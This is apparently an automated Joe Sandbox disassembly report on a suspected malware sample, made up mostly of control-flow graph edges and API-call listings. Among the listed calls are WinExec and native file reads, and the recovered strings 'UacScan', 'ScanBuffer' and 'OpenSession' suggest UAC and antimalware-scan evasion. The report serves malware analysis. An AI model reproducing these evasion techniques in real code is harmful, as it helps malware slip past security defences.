36275->36278 36279 2d77be8 17 API calls 36276->36279 36281 2d88db8 36278->36281 36282 2d80c32 36279->36282 36286 2d64c24 SysFreeString 36281->36286 36284 2d64824 11 API calls 36282->36284 36294 2d80c53 36284->36294 36288 2d88dc3 36286->36288 36289 2d644c4 11 API calls 36288->36289 36291 2d88dd3 36289->36291 36293 2d64c24 SysFreeString 36291->36293 36296 2d88dde 36293->36296 36297 2d80c6b 36294->36297 36299 2d644a0 11 API calls 36296->36299 36300 2d647b0 11 API calls 36297->36300 36302 2d88de9 36299->36302 36308 2d80c8a 36300->36308 36304 2d64c24 SysFreeString 36302->36304 36305 2d88df4 36304->36305 36307 2d644c4 11 API calls 36305->36307 36310 2d88e04 36307->36310 36311 2d80ca2 36308->36311 36313 2d644a0 11 API calls 36310->36313 36314 2d77be8 17 API calls 36311->36314 36316 2d88e0f 36313->36316 36317 2d80cae 36314->36317 36319 2d644c4 11 API calls 36316->36319 37939 2d7d20c 36317->37939 36322 2d88e1f 36319->36322 36327 2d644c4 11 API calls 36322->36327 36325 2d644f4 11 API calls 36328 2d80cce 36325->36328 36330 2d88e2f 36327->36330 36332 2d64824 11 API calls 36328->36332 38423 2d657a0 13 API calls 36330->38423 36341 2d80cef 36332->36341 36334 2d88e40 36336 2d644c4 11 API calls 36334->36336 36338 2d88e50 36336->36338 36340 2d644c4 11 API calls 36338->36340 36342 2d88e60 36340->36342 36344 2d647b0 11 API calls 36341->36344 38424 2d6e3b0 52 API calls 36342->38424 36347 2d80d26 36344->36347 36346 2d88e6b 36349 2d644c4 11 API calls 36346->36349 36352 2d80d31 36347->36352 36351 2d88e7b 36349->36351 36354 2d644c4 11 API calls 36351->36354 36358 2d77be8 17 API calls 36352->36358 36356 2d88e8b 36354->36356 36364 2d644c4 11 API calls 36356->36364 36360 2d80d4a 36358->36360 36362 2d64824 11 API calls 36360->36362 36371 2d80d6b 36362->36371 36366 2d88ea6 36364->36366 38425 2d657a0 13 API calls 36366->38425 36368 2d88eb7 36370 2d644c4 11 API calls 36368->36370 36373 2d88ec7 36370->36373 36376 2d647b0 11 API calls 36371->36376 36375 2d644a0 11 API calls 36373->36375 36378 
2d88ed2 36375->36378 36379 2d80da2 36376->36379 36381 2d644c4 11 API calls 36378->36381 36383 2d80dad 36379->36383 36382 2d88ee2 36381->36382 36385 2d644c4 11 API calls 36382->36385 36388 2d80dba 36383->36388 36387 2d88ef2 36385->36387 38426 2d657a0 13 API calls 36387->38426 36391 2d77be8 17 API calls 36388->36391 36394 2d80dc6 36391->36394 36393 2d88f03 36396 2d644c4 11 API calls 36393->36396 36397 2d64824 11 API calls 36394->36397 36399 2d88f13 36396->36399 36400 2d80de7 36397->36400 36402 2d64c24 SysFreeString 36399->36402 36403 2d80df2 36400->36403 36405 2d88f1e 36402->36405 36409 2d80dff 36403->36409 36406 2d644c4 11 API calls 36405->36406 36408 2d88f2e 36406->36408 36410 2d64c24 SysFreeString 36408->36410 36411 2d647b0 11 API calls 36409->36411 36413 2d88f39 36410->36413 36414 2d80e1e 36411->36414 36416 2d644c4 11 API calls 36413->36416 36418 2d80e29 36414->36418 36417 2d88f49 36416->36417 38427 2d657a0 13 API calls 36417->38427 36423 2d80e36 36418->36423 36422 2d88f5a 36425 2d644c4 11 API calls 36422->36425 36426 2d77be8 17 API calls 36423->36426 36428 2d88f6a 36425->36428 36429 2d80e42 36426->36429 36431 2d64c24 SysFreeString 36428->36431 36434 2d80e53 36429->36434 36433 2d88f75 36431->36433 36436 2d644c4 11 API calls 36433->36436 37944 2d7c640 36434->37944 36439 2d88f85 36436->36439 36444 2d644c4 11 API calls 36439->36444 36447 2d88f95 36444->36447 36448 2d644c4 11 API calls 36447->36448 36450 2d88fa5 36448->36450 36449 2d64824 11 API calls 36451 2d80e9d 36449->36451 36453 2d644c4 11 API calls 36450->36453 36456 2d80ea8 36451->36456 36455 2d88fb5 36453->36455 36455->35387 36459 2d80eb5 36456->36459 36461 2d647b0 11 API calls 36459->36461 36466 2d80ed4 36461->36466 36468 2d80eec 36466->36468 36470 2d77be8 17 API calls 36468->36470 36472 2d80ef8 36470->36472 36474 2d64824 11 API calls 36472->36474 36475 2d80f19 36474->36475 36478 2d80f24 36475->36478 36481 2d80f31 36478->36481 36483 2d647b0 11 API calls 36481->36483 36488 2d80f50 36483->36488 36490 2d80f68 
36488->36490 36492 2d77be8 17 API calls 36490->36492 36494 2d80f74 36492->36494 36495 2d644f4 11 API calls 36494->36495 36497 2d80f83 36495->36497 36498 2d644f4 11 API calls 36497->36498 36499 2d80f92 36498->36499 36501 2d644f4 11 API calls 36499->36501 36502 2d80fa1 36501->36502 36504 2d644f4 11 API calls 36502->36504 36506 2d80fb0 36504->36506 36507 2d644f4 11 API calls 36506->36507 36509 2d80fbf 36507->36509 36511 2d644f4 11 API calls 36509->36511 36513 2d80fce 36511->36513 36515 2d644f4 11 API calls 36513->36515 36516 2d80fdd 36515->36516 36517 2d644f4 11 API calls 36516->36517 36518 2d80fec 36517->36518 36520 2d644f4 11 API calls 36518->36520 36521 2d80ffb 36520->36521 36523 2d644f4 11 API calls 36521->36523 36524 2d8100a 36523->36524 36526 2d644f4 11 API calls 36524->36526 36527 2d81019 36526->36527 36528 2d64824 11 API calls 36527->36528 36533 2d8103a 36528->36533 36535 2d647b0 11 API calls 36533->36535 36539 2d81071 36535->36539 36540 2d77be8 17 API calls 36539->36540 36542 2d81095 36540->36542 36543 2d64824 11 API calls 36542->36543 36547 2d810b6 36543->36547 36549 2d810ce 36547->36549 36550 2d647b0 11 API calls 36549->36550 36552 2d810ed 36550->36552 36553 2d81105 36552->36553 36554 2d77be8 17 API calls 36553->36554 36557 2d81111 36554->36557 36558 2d81128 36557->36558 37961 2d67e3c 36558->37961 36562 2d8113b 36565 2d64824 11 API calls 36562->36565 36563 2d81324 36564 2d64824 11 API calls 36563->36564 36566 2d81345 36564->36566 36567 2d8115c 36565->36567 36569 2d81350 36566->36569 36573 2d81174 36567->36573 36572 2d8135d 36569->36572 36574 2d647b0 11 API calls 36572->36574 36575 2d647b0 11 API calls 36573->36575 36576 2d8137c 36574->36576 36579 2d81193 36575->36579 36580 2d81394 36576->36580 36581 2d77be8 17 API calls 36579->36581 36582 2d77be8 17 API calls 36580->36582 36583 2d811b7 36581->36583 36585 2d813a0 36582->36585 36586 2d64824 11 API calls 36583->36586 36588 2d64824 11 API calls 36585->36588 36590 2d811d8 36586->36590 36589 2d813c1 36588->36589 
36591 2d813cc 36589->36591 36595 2d811f0 36590->36595 36594 2d813d9 36591->36594 36596 2d647b0 11 API calls 36594->36596 36597 2d647b0 11 API calls 36595->36597 36598 2d813f8 36596->36598 36599 2d8120f 36597->36599 36603 2d81410 36598->36603 36604 2d81227 36599->36604 36606 2d77be8 17 API calls 36603->36606 36605 2d77be8 17 API calls 36604->36605 36607 2d81233 36605->36607 36609 2d8141c 36606->36609 36614 2d647b0 11 API calls 36607->36614 36612 2d649c4 11 API calls 36609->36612 36613 2d8144f 36612->36613 36616 2d64824 11 API calls 36613->36616 36618 2d81262 36614->36618 36619 2d81470 36616->36619 36621 2d77be8 17 API calls 36618->36621 36623 2d647b0 11 API calls 36619->36623 36624 2d81286 36621->36624 36629 2d814a7 36623->36629 36626 2d64824 11 API calls 36624->36626 36627 2d812a7 36626->36627 36630 2d812bf 36627->36630 36633 2d77be8 17 API calls 36629->36633 36634 2d647b0 11 API calls 36630->36634 36636 2d814cb 36633->36636 36637 2d812de 36634->36637 36639 2d64824 11 API calls 36636->36639 36640 2d812f6 36637->36640 36641 2d814ec 36639->36641 36644 2d77be8 17 API calls 36640->36644 36643 2d81504 36641->36643 36646 2d647b0 11 API calls 36643->36646 36647 2d81302 36644->36647 36650 2d81523 36646->36650 36648 2d81319 36647->36648 38397 2d68004 CreateDirectoryA 36648->38397 36651 2d8153b 36650->36651 36655 2d77be8 17 API calls 36651->36655 36657 2d81547 36655->36657 36659 2d64824 11 API calls 36657->36659 36661 2d81568 36659->36661 36663 2d81573 36661->36663 36666 2d647b0 11 API calls 36663->36666 36668 2d8159f 36666->36668 36671 2d815aa 36668->36671 36674 2d77be8 17 API calls 36671->36674 36675 2d815c3 36674->36675 36677 2d64824 11 API calls 36675->36677 36682 2d815e4 36677->36682 36684 2d647b0 11 API calls 36682->36684 36687 2d8161b 36684->36687 36690 2d77be8 17 API calls 36687->36690 36692 2d8163f 36690->36692 36697 2d81654 36692->36697 36698 2d83345 36692->36698 36701 2d64824 11 API calls 36697->36701 36700 2d64824 11 API calls 36698->36700 36703 2d83366 
36700->36703 36706 2d81692 36701->36706 36708 2d83371 36703->36708 36707 2d816aa 36706->36707 36709 2d67e18 GetFileAttributesA 36707->36709 36710 2d647b0 11 API calls 36708->36710 36711 2d816b5 36709->36711 36713 2d8339d 36710->36713 36711->36698 36714 2d816bd 36711->36714 36720 2d833a8 36713->36720 36716 2d64824 11 API calls 36714->36716 36723 2d816de 36716->36723 36722 2d77be8 17 API calls 36720->36722 36725 2d833c1 36722->36725 36729 2d647b0 11 API calls 36723->36729 36726 2d64824 11 API calls 36725->36726 36732 2d833e2 36726->36732 36734 2d81715 36729->36734 36735 2d647b0 11 API calls 36732->36735 36736 2d77be8 17 API calls 36734->36736 36742 2d83419 36735->36742 36737 2d81739 36736->36737 36739 2d64824 11 API calls 36737->36739 36746 2d8175a 36739->36746 36745 2d77be8 17 API calls 36742->36745 36748 2d8343d 36745->36748 36749 2d81772 36746->36749 36751 2d64824 11 API calls 36748->36751 36752 2d647b0 11 API calls 36749->36752 36754 2d8345e 36751->36754 36758 2d81791 36752->36758 36757 2d83476 36754->36757 36760 2d647b0 11 API calls 36757->36760 36761 2d817a9 36758->36761 36763 2d83495 36760->36763 36764 2d77be8 17 API calls 36761->36764 36770 2d834ad 36763->36770 36765 2d817b5 36764->36765 36767 2d64824 11 API calls 36765->36767 36768 2d817d6 36767->36768 36771 2d817e1 36768->36771 36773 2d77be8 17 API calls 36770->36773 36778 2d647b0 11 API calls 36771->36778 36775 2d834b9 36773->36775 36777 2d64824 11 API calls 36775->36777 36780 2d834da 36777->36780 36781 2d8180d 36778->36781 36786 2d834e5 36780->36786 36783 2d81818 36781->36783 36790 2d77be8 17 API calls 36783->36790 36787 2d647b0 11 API calls 36786->36787 36789 2d83511 36787->36789 36796 2d8351c 36789->36796 36791 2d81831 36790->36791 36792 2d81841 36791->36792 36794 2d67e3c GetFileAttributesA 36792->36794 36797 2d8184c 36794->36797 36798 2d77be8 17 API calls 36796->36798 36797->36698 36799 2d81854 36797->36799 36801 2d83535 36798->36801 36802 2d64824 11 API calls 36799->36802 36804 2d64824 11 API calls 
36801->36804 36808 2d81875 36802->36808 36810 2d83556 36804->36810 36813 2d647b0 11 API calls 36808->36813 36812 2d647b0 11 API calls 36810->36812 36818 2d8358d 36812->36818 36819 2d818ac 36813->36819 36822 2d77be8 17 API calls 36818->36822 36820 2d77be8 17 API calls 36819->36820 36823 2d818d0 36820->36823 36825 2d835b1 36822->36825 36826 2d64824 11 API calls 36823->36826 37970 2d7c78c 36825->37970 36835 2d818f1 36826->36835 36832 2d644f4 11 API calls 36834 2d835d7 36832->36834 36837 2d64824 11 API calls 36834->36837 36840 2d647b0 11 API calls 36835->36840 36839 2d835f8 36837->36839 36845 2d83603 36839->36845 36847 2d81928 36840->36847 36846 2d647b0 11 API calls 36845->36846 36848 2d8362f 36846->36848 36851 2d77be8 17 API calls 36847->36851 36850 2d8363a 36848->36850 36854 2d83647 36850->36854 36856 2d8194c 36851->36856 36858 2d77be8 17 API calls 36854->36858 38398 2d6794c 11 API calls 36856->38398 36860 2d83653 36858->36860 36863 2d64824 11 API calls 36860->36863 36866 2d83674 36863->36866 36864 2d81981 36869 2d64824 11 API calls 36864->36869 36872 2d8367f 36866->36872 36877 2d819d8 36869->36877 36873 2d647b0 11 API calls 36872->36873 36875 2d836ab 36873->36875 36876 2d836b6 36875->36876 36879 2d836c3 36876->36879 36880 2d647b0 11 API calls 36877->36880 36883 2d77be8 17 API calls 36879->36883 36885 2d81a0f 36880->36885 36884 2d836cf 36883->36884 36887 2d67a88 42 API calls 36884->36887 36890 2d77be8 17 API calls 36885->36890 36889 2d836d9 36887->36889 36892 2d7d270 11 API calls 36889->36892 36893 2d81a33 36890->36893 36894 2d836eb 36892->36894 36895 2d64824 11 API calls 36893->36895 36896 2d644f4 11 API calls 36894->36896 36901 2d81a79 36895->36901 36897 2d836fb 36896->36897 36899 2d64824 11 API calls 36897->36899 36900 2d8371c 36899->36900 36902 2d83727 36900->36902 37965 2d74d90 36901->37965 36903 2d647b0 11 API calls 36902->36903 36905 2d83753 36903->36905 36904 2d81aa1 36904->35387 36906 2d77be8 17 API calls 36905->36906 36908 2d83777 36906->36908 36910 2d64824 
11 API calls 36908->36910 36912 2d83798 36910->36912 36915 2d647b0 11 API calls 36912->36915 36920 2d837cf 36915->36920 36923 2d77be8 17 API calls 36920->36923 36925 2d837f3 36923->36925 36927 2d64824 11 API calls 36925->36927 36929 2d83814 36927->36929 36932 2d647b0 11 API calls 36929->36932 36937 2d8384b 36932->36937 36940 2d77be8 17 API calls 36937->36940 36942 2d8386f 36940->36942 36944 2d64824 11 API calls 36942->36944 36948 2d83890 36944->36948 36950 2d647b0 11 API calls 36948->36950 36953 2d838c7 36950->36953 36956 2d77be8 17 API calls 36953->36956 36958 2d838eb 36956->36958 37983 2d7d198 36958->37983 36962 2d7d20c 11 API calls 36964 2d8390c 36962->36964 36966 2d644f4 11 API calls 36964->36966 36967 2d8391c 36966->36967 36968 2d64824 11 API calls 36967->36968 36971 2d8393d 36968->36971 36972 2d647b0 11 API calls 36971->36972 36975 2d83974 36972->36975 36976 2d77be8 17 API calls 36975->36976 36977 2d83998 36976->36977 36978 2d64824 11 API calls 36977->36978 36979 2d839b9 36978->36979 36980 2d647b0 11 API calls 36979->36980 36981 2d839f0 36980->36981 36982 2d77be8 17 API calls 36981->36982 36983 2d83a14 36982->36983 36984 2d64824 11 API calls 36983->36984 36985 2d83a35 36984->36985 36986 2d647b0 11 API calls 36985->36986 36987 2d83a6c 36986->36987 36988 2d77be8 17 API calls 36987->36988 36989 2d83a90 36988->36989 36990 2d64824 11 API calls 36989->36990 36991 2d83ab1 36990->36991 36992 2d647b0 11 API calls 36991->36992 36993 2d83ae8 36992->36993 36994 2d77be8 17 API calls 36993->36994 36995 2d83b0c 36994->36995 36996 2d64824 11 API calls 36995->36996 36997 2d83b2d 36996->36997 36998 2d647b0 11 API calls 36997->36998 36999 2d83b64 36998->36999 37000 2d77be8 17 API calls 36999->37000 37001 2d83b88 37000->37001 37002 2d64824 11 API calls 37001->37002 37003 2d83ba9 37002->37003 37004 2d647b0 11 API calls 37003->37004 37005 2d83be0 37004->37005 37006 2d77be8 17 API calls 37005->37006 37007 2d83c04 37006->37007 37008 2d853e0 37007->37008 37009 2d64824 11 API calls 
37007->37009 37010 2d64824 11 API calls 37008->37010 37012 2d83c39 37009->37012 37011 2d85401 37010->37011 37013 2d647b0 11 API calls 37011->37013 37014 2d67e18 GetFileAttributesA 37012->37014 37018 2d85438 37013->37018 37015 2d83c5c 37014->37015 37015->37008 37016 2d83c64 37015->37016 37017 2d64824 11 API calls 37016->37017 37020 2d83c85 37017->37020 37019 2d77be8 17 API calls 37018->37019 37021 2d8545c 37019->37021 37023 2d647b0 11 API calls 37020->37023 37022 2d64824 11 API calls 37021->37022 37024 2d8547d 37022->37024 37025 2d83cbc 37023->37025 37026 2d647b0 11 API calls 37024->37026 37027 2d77be8 17 API calls 37025->37027 37030 2d854b4 37026->37030 37028 2d83ce0 37027->37028 37029 2d64824 11 API calls 37028->37029 37033 2d83d01 37029->37033 37031 2d77be8 17 API calls 37030->37031 37032 2d854d8 37031->37032 37034 2d64824 11 API calls 37032->37034 37035 2d647b0 11 API calls 37033->37035 37036 2d854f9 37034->37036 37037 2d83d38 37035->37037 37038 2d647b0 11 API calls 37036->37038 37039 2d77be8 17 API calls 37037->37039 37042 2d85530 37038->37042 37040 2d83d5c 37039->37040 37041 2d64824 11 API calls 37040->37041 37045 2d83d7d 37041->37045 37043 2d77be8 17 API calls 37042->37043 37044 2d85554 37043->37044 37046 2d64824 11 API calls 37044->37046 37047 2d647b0 11 API calls 37045->37047 37048 2d85575 37046->37048 37049 2d83db4 37047->37049 37050 2d647b0 11 API calls 37048->37050 37051 2d77be8 17 API calls 37049->37051 37054 2d855ac 37050->37054 37052 2d83dd8 37051->37052 37053 2d64824 11 API calls 37052->37053 37057 2d83df9 37053->37057 37055 2d77be8 17 API calls 37054->37055 37056 2d855d0 37055->37056 37058 2d64824 11 API calls 37056->37058 37059 2d64824 11 API calls 37057->37059 37060 2d855f1 37058->37060 37061 2d83e31 37059->37061 37062 2d647b0 11 API calls 37060->37062 37063 2d647b0 11 API calls 37061->37063 37064 2d85628 37062->37064 37065 2d83e68 37063->37065 37066 2d77be8 17 API calls 37064->37066 37068 2d77be8 17 API calls 37065->37068 37067 2d8564c 
37066->37067 37071 2d86190 37067->37071 37072 2d85661 37067->37072 37069 2d83e8c 37068->37069 37070 2d64824 11 API calls 37069->37070 37075 2d83ead 37070->37075 37073 2d64824 11 API calls 37071->37073 37074 2d64824 11 API calls 37072->37074 37077 2d861b1 37073->37077 37078 2d85682 37074->37078 37076 2d647b0 11 API calls 37075->37076 37081 2d83ee4 37076->37081 37079 2d647b0 11 API calls 37077->37079 37080 2d647b0 11 API calls 37078->37080 37084 2d861e8 37079->37084 37082 2d856b9 37080->37082 37083 2d77be8 17 API calls 37081->37083 37086 2d77be8 17 API calls 37082->37086 37085 2d83f08 37083->37085 37088 2d77be8 17 API calls 37084->37088 37087 2d64824 11 API calls 37085->37087 37089 2d856dd 37086->37089 37093 2d83f29 37087->37093 37090 2d8620c 37088->37090 37092 2d64824 11 API calls 37089->37092 37091 2d64824 11 API calls 37090->37091 37094 2d8622d 37091->37094 37095 2d856fe 37092->37095 37096 2d647b0 11 API calls 37093->37096 37097 2d647b0 11 API calls 37094->37097 37098 2d647b0 11 API calls 37095->37098 37099 2d83f60 37096->37099 37101 2d86264 37097->37101 37102 2d85735 37098->37102 37100 2d77be8 17 API calls 37099->37100 37103 2d83f84 37100->37103 37106 2d77be8 17 API calls 37101->37106 37104 2d77be8 17 API calls 37102->37104 37105 2d64824 11 API calls 37103->37105 37107 2d85759 37104->37107 37111 2d83fa5 37105->37111 37108 2d86288 37106->37108 37109 2d64824 11 API calls 37107->37109 37110 2d64824 11 API calls 37108->37110 37113 2d8577a 37109->37113 37112 2d862a9 37110->37112 37114 2d647b0 11 API calls 37111->37114 37115 2d647b0 11 API calls 37112->37115 37116 2d647b0 11 API calls 37113->37116 37117 2d83fdc 37114->37117 37119 2d862e0 37115->37119 37120 2d857b1 37116->37120 37118 2d77be8 17 API calls 37117->37118 37121 2d84000 37118->37121 37123 2d77be8 17 API calls 37119->37123 37124 2d77be8 17 API calls 37120->37124 37122 2d64824 11 API calls 37121->37122 37130 2d8403a 37122->37130 37125 2d86304 37123->37125 37126 2d857d5 37124->37126 37128 2d64824 11 API calls 
37125->37128 37127 2d647b0 11 API calls 37126->37127 37129 2d857ed 37127->37129 37132 2d86325 37128->37132 37131 2d857f8 WinExec 37129->37131 37134 2d64824 11 API calls 37130->37134 37133 2d64824 11 API calls 37131->37133 37135 2d647b0 11 API calls 37132->37135 37136 2d8581f 37133->37136 37137 2d84072 37134->37137 37139 2d8635c 37135->37139 37140 2d647b0 11 API calls 37136->37140 37138 2d647b0 11 API calls 37137->37138 37142 2d840a9 37138->37142 37141 2d77be8 17 API calls 37139->37141 37143 2d85856 37140->37143 37147 2d86380 37141->37147 37145 2d77be8 17 API calls 37142->37145 37144 2d77be8 17 API calls 37143->37144 37148 2d8587a 37144->37148 37149 2d840cd 37145->37149 37146 2d86b54 37150 2d64824 11 API calls 37146->37150 37147->37146 37151 2d64824 11 API calls 37147->37151 37152 2d64824 11 API calls 37148->37152 37153 2d64824 11 API calls 37149->37153 37154 2d86b75 37150->37154 37155 2d863b6 37151->37155 37156 2d8589b 37152->37156 37157 2d840ee 37153->37157 37158 2d647b0 11 API calls 37154->37158 37159 2d647b0 11 API calls 37155->37159 37160 2d647b0 11 API calls 37156->37160 37161 2d647b0 11 API calls 37157->37161 37162 2d86bac 37158->37162 37163 2d863ed 37159->37163 37165 2d858d2 37160->37165 37164 2d84125 37161->37164 37166 2d77be8 17 API calls 37162->37166 37167 2d77be8 17 API calls 37163->37167 37168 2d77be8 17 API calls 37164->37168 37171 2d77be8 17 API calls 37165->37171 37169 2d86bd0 37166->37169 37170 2d86411 37167->37170 37172 2d84149 37168->37172 37173 2d64824 11 API calls 37169->37173 37174 2d64824 11 API calls 37170->37174 37175 2d858f6 37171->37175 37177 2d64824 11 API calls 37172->37177 37178 2d86bf1 37173->37178 37179 2d86432 37174->37179 37176 2d64824 11 API calls 37175->37176 37180 2d85917 37176->37180 37181 2d8416a 37177->37181 37182 2d647b0 11 API calls 37178->37182 37183 2d647b0 11 API calls 37179->37183 37184 2d647b0 11 API calls 37180->37184 37185 2d647b0 11 API calls 37181->37185 37186 2d86c28 37182->37186 37187 2d86469 37183->37187 37189 
2d8594e 37184->37189 37188 2d841a1 37185->37188 37190 2d77be8 17 API calls 37186->37190 37191 2d77be8 17 API calls 37187->37191 37192 2d77be8 17 API calls 37188->37192 37195 2d77be8 17 API calls 37189->37195 37193 2d86c4c 37190->37193 37194 2d8648d 37191->37194 37196 2d841c5 37192->37196 37197 2d64824 11 API calls 37193->37197 37198 2d64824 11 API calls 37194->37198 37200 2d85972 37195->37200 37199 2d64824 11 API calls 37196->37199 37201 2d86c6d 37197->37201 37202 2d864ae 37198->37202 37204 2d841e6 37199->37204 38401 2d79e70 29 API calls 37200->38401 37206 2d647b0 11 API calls 37201->37206 37207 2d647b0 11 API calls 37202->37207 37209 2d647b0 11 API calls 37204->37209 37205 2d85999 37208 2d64824 11 API calls 37205->37208 37210 2d86ca4 37206->37210 37211 2d864e5 37207->37211 37212 2d859ba 37208->37212 37213 2d8421d 37209->37213 37214 2d77be8 17 API calls 37210->37214 37215 2d77be8 17 API calls 37211->37215 37218 2d647b0 11 API calls 37212->37218 37216 2d77be8 17 API calls 37213->37216 37228 2d86cc8 37214->37228 37217 2d86509 37215->37217 37219 2d84241 37216->37219 37220 2d64824 11 API calls 37217->37220 37224 2d859f1 37218->37224 37221 2d64824 11 API calls 37219->37221 37225 2d8652a 37220->37225 37227 2d84262 37221->37227 37222 2d874a8 37223 2d64824 11 API calls 37222->37223 37234 2d874c9 37223->37234 37226 2d77be8 17 API calls 37224->37226 37231 2d647b0 11 API calls 37225->37231 37229 2d85a15 37226->37229 37233 2d647b0 11 API calls 37227->37233 37228->37222 37230 2d64824 11 API calls 37228->37230 37232 2d64824 11 API calls 37229->37232 37236 2d86d13 37230->37236 37237 2d86561 37231->37237 37238 2d85a36 37232->37238 37239 2d84299 37233->37239 37235 2d647b0 11 API calls 37234->37235 37243 2d87500 37235->37243 37240 2d647b0 11 API calls 37236->37240 37241 2d77be8 17 API calls 37237->37241 37244 2d647b0 11 API calls 37238->37244 37245 2d77be8 17 API calls 37239->37245 37250 2d86d4a 37240->37250 37242 2d86585 37241->37242 37246 2d64824 11 API calls 37242->37246 37249 
2d77be8 17 API calls 37243->37249 37253 2d85a6d 37244->37253 37247 2d842bd 37245->37247 37255 2d865a6 37246->37255 37248 2d64824 11 API calls 37247->37248 37256 2d842de 37248->37256 37251 2d87524 37249->37251 37254 2d77be8 17 API calls 37250->37254 37252 2d64824 11 API calls 37251->37252 37264 2d87545 37252->37264 37258 2d77be8 17 API calls 37253->37258 37257 2d86d6e 37254->37257 37260 2d647b0 11 API calls 37255->37260 37263 2d647b0 11 API calls 37256->37263 37259 2d64824 11 API calls 37257->37259 37261 2d85a91 37258->37261 37266 2d86d8f 37259->37266 37267 2d865dd 37260->37267 37262 2d64824 11 API calls 37261->37262 37268 2d85ab2 37262->37268 37269 2d84315 37263->37269 37265 2d647b0 11 API calls 37264->37265 37273 2d8757c 37265->37273 37270 2d647b0 11 API calls 37266->37270 37271 2d77be8 17 API calls 37267->37271 37274 2d647b0 11 API calls 37268->37274 37275 2d77be8 17 API calls 37269->37275 37280 2d86dc6 37270->37280 37272 2d86601 37271->37272 37276 2d64824 11 API calls 37272->37276 37278 2d77be8 17 API calls 37273->37278 37284 2d85ae9 37274->37284 37277 2d84339 37275->37277 37287 2d86622 37276->37287 37279 2d64824 11 API calls 37277->37279 37281 2d875a0 37278->37281 37282 2d84361 37279->37282 37286 2d77be8 17 API calls 37280->37286 37283 2d64824 11 API calls 37281->37283 37285 2d8436c WinExec 37282->37285 37294 2d875c1 37283->37294 37290 2d77be8 17 API calls 37284->37290 37288 2d64824 11 API calls 37285->37288 37289 2d86dea 37286->37289 37292 2d647b0 11 API calls 37287->37292 37296 2d84393 37288->37296 37291 2d64824 11 API calls 37289->37291 37293 2d85b0d 37290->37293 37298 2d86e0b 37291->37298 37299 2d86659 37292->37299 37295 2d64824 11 API calls 37293->37295 37297 2d647b0 11 API calls 37294->37297 37305 2d85b4d 37295->37305 37300 2d647b0 11 API calls 37296->37300 37304 2d875f8 37297->37304 37301 2d647b0 11 API calls 37298->37301 37302 2d77be8 17 API calls 37299->37302 37310 2d843ca 37300->37310 37311 2d86e42 37301->37311 37303 2d8667d 37302->37303 37306 2d62ee0 
[Control-flow graph edge list (tail of the preceding function's rendered graph) not recoverable as text. API calls named in it: GetTickCount, GetFileAttributesA, RtlDosPathNameToNtPathName_U, NtOpenFile, NtQueryInformationFile, NtReadFile, NtClose, SysFreeString, SysAllocStringLen, SysReAllocStringLen, WriteFile, CreateFileA, GetLastError, RtlMoveMemory, Sleep, VirtualAlloc, VirtualFree, timeSetEvent, GetMessageA, TranslateMessage, DispatchMessageA, GetStdHandle, MessageBoxA, FreeLibrary, ExitProcess, GetModuleFileNameA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, lstrcpynA, lstrlenA, GetThreadLocale, GetLocaleInfoA, LoadLibraryExA, GetCurrentProcess, GetModuleHandleW, GetProcAddress, NtAllocateVirtualMemory]
                                                                                        APIs
                                                                                        • InetIsOffline.URL(00000000,00000000,02D88FB6,?,?,?,00000000,00000000), ref: 02D7D604
                                                                                          • Part of subcall function 02D77BE8: LoadLibraryW.KERNEL32(?,00000000,02D77C9A), ref: 02D77C18
                                                                                          • Part of subcall function 02D77BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02D77C9A), ref: 02D77C1E
                                                                                          • Part of subcall function 02D77BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02D77C37
                                                                                          • Part of subcall function 02D67E18: GetFileAttributesA.KERNEL32(00000000,?,02D7E0EE,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC,UacScan,02DC5344,02D88FEC,UacInitialize), ref: 02D67E23
                                                                                          • Part of subcall function 02D6C320: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02DC55F0,?,02D7E40F,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,OpenSession), ref: 02D6C337
                                                                                          • Part of subcall function 02D7C4DC: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02D7C5AC), ref: 02D7C517
                                                                                          • Part of subcall function 02D7C4DC: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02D7C5AC), ref: 02D7C547
                                                                                          • Part of subcall function 02D7C4DC: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02D7C55C
                                                                                          • Part of subcall function 02D7C4DC: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02D7C588
                                                                                          • Part of subcall function 02D7C4DC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02D7C591
                                                                                          • Part of subcall function 02D67E3C: GetFileAttributesA.KERNEL32(00000000,?,02D81133,ScanString,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,ScanBuffer,02DC5344,02D88FEC,ScanString), ref: 02D67E47
                                                                                          • Part of subcall function 02D68004: CreateDirectoryA.KERNEL32(00000000,00000000,?,02D81324,ScanBuffer,02DC5344,02D88FEC,OpenSession,02DC5344,02D88FEC,Initialize,02DC5344,02D88FEC,ScanString,02DC5344,02D88FEC), ref: 02D68011
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2148779306.0000000002D61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2148733672.0000000002D60000.00000002.00001000.00020000.00000000.sdmp
                                                                                        • Associated: 00000000.00000002.2149075282.0000000002D8B000.00000004.00001000.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_2d60000_udVh4Ist4Z.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesModuleNamePath$AddressCloseCreateDirectoryHandleInetInformationLibraryLoadName_OfflineOpenProcQueryRead
